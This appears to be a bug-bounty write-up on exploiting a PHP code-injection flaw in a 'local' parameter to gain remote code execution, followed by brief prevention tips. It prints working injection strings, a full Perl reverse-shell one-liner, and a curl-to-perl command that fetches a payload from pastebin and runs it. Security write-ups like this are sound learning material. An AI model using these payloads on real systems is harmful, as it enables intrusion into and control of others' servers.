RCE By Code Injection | Perl Reverse Shell

what is php code injection weakness ?

Code injection is an attack that delivers a malicious code payload through a vulnerable attack vector in eval() function without any sanitization or block dangerous functions like exec(), shell_exec(), system() or passthru()

Background story

While hunting on a private program I like to search on custom parameters in burpsuite after finishing test , like ssrf , lfi , xss parameters and custom by me , you can see this repo GF-Patterns to many parameters
I have found interested parameter name [ local ] in post request , I am trying to test ssrf and lfi but failed
Trying inject PHP code because subdomain uses PHP backend, so.. lets hack :)

Injected payload

no reflacted string

Using [ ; ] to skip the previous function but failed [X]


Using single qoute [‘] to close statement and [.] to concatenate => ‘..’


Injected Code Success ^_^

Remote Code Execution

The expected backend code:

$input = $_REQUEST['local'];

If parameter value reflects inside double quotes will execute but inside single quotes cannot execute so we used single quote to close the statement and dot sign to concatenate

$input = $_REQUEST['local'];

Getting Reverse Shell

I am listening on 1234 port on vps and trying to get reverse shell ..
Trying by bash script and many other ways but failed [X] :(
Trying to check netcat or socat in server ? but not installed [X]

'.system("nc -v").'
not reflected any data mean not performing the command

Trying checks many languages like python , ruby and many of tools which can get reverse shell , not found but when check Perl language

found Perl v5.20
funny meme ^_^

we can get reverse shell by this code

perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
request syntax error because [&] sign

Failed operation because sign [&] means end the parameter and start new parameter like username=admin&password=pass
I am trying to encode this sign but not work ..
I am trying to check curl tool installed or no ? by this query

'.system("curl -v").'

It was found. good, lets bypass this operation

I am uploading Perl code on pastebin website after remove perl -e and [‘] quote ..

use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

Using curl to access this code and execute by pipe signal

curl https://pastebin.com/raw/EEaH**** | perl
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
Reverse Shell via Perl

BOOM !! , it’s worked and get a reverse shell

Prevent PHP code injection

- Replace or Ban arguments with & ; && |
- Avoid using exec(), shell_exec(), system() or passthru()
- Avoid using strip_tags() for sanitisation
- Use a PHP security linter
- Utilise a SAST tool to identify code injection issues
- Do not trust any data from user

Stay in touch

Linkedin | Github | Twitter |Facebook

Cyber Security Engineer | Penetration tester